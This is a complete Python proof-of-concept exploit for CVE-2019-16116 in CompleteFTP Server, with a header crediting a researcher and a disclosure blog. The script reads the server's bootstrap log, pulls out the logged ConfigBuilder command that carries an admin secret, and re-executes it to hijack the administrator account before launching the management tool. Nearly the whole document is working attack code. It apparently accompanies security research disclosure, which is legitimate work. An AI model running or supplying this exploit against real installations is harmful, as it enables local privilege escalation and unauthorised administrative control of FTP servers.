##############################################################################################################################
##                                                                                                                          ##
##      PoC exploit for CVE-2019-16116                                                                                      ##
##      Researcher: Robert Fisher (Twitter: @be0vlk)                                                                        ##
##      Blog Post: https://rhinosecuritylabs.com/application-security/completeftp-server-local-privesc-cve-2019-16116/      ##  
##                                                                                                                          ##
##############################################################################################################################

import subprocess

log_file = r"C:\Program Files (x86)\Complete FTP\Server\Bootstrapper.log"
admin_secret_line = r"INFO ConfigBuilder Launching"
manager_exe = r"C:\Program Files (x86)\Complete FTP\Manager\CompleteFTPManager.exe"

try:
    with open(log_file, "r") as bootstrap:
        for line in bootstrap.readlines():
            if admin_secret_line in line:
                line = line.split("Launching", 1)[-1].lstrip()
                subprocess.run(r"{}".format(line))
        print("\n[+] Admin account hijacked! Opening management tool...")
        subprocess.run(r"{}".format(manager_exe))
except FileNotFoundError:
    print("\n[!] Files not found. Verify the program directory.")

